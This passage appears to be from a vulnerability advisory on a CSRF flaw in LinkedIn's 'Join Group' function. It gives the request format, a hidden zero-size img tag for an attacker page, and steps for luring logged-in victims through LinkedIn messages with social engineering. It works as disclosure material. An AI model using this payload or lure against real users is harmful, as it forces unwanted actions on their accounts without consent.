Next, we show a typical request to the "Join Group" functionality:
POST /nhome/nux/group HTTP/1.1
Host: www.linkedin.com
...
grpId=<groupid>trk=nux-group-join
Also, We can use HTTP GET method instead the HTTP POST method used at
this request. This makes it more easy the exploitation of the CSRF vulnerability. So, finally, this
HTTP request provoke the
same result that the original HTTP POST request:
GET /nhome/nux/group?grpId=<groupid>&trk=nux-group-join HTTP/1.1
Host: www.linkedin.com
...
1. An attacker create a web page "csrf-exploit.html" that realize a HTTP
GET request to the "Join Group" functionality.
For example:
...
<img height="0" src="http://www.linkedin.com/nhome/nux/group?grpId=<GROUPID>&trk=nux-group-join" width="0" />
...
2. A user authenticated in LinkedIn visit the "csrf-exploit.html" page
controlled by the attacker.
For example, the attacker sends a mail to the victim (through the
messaging system that provides LinkedIn is better as it ensures that the victim user is authenticated)
and provokes that the victim visits his page (using social engineering techniques).
3. The attacker receives an invitation request from the victim user, so
the attacker just accept this invitation and the user is added to his group.
</groupid></groupid>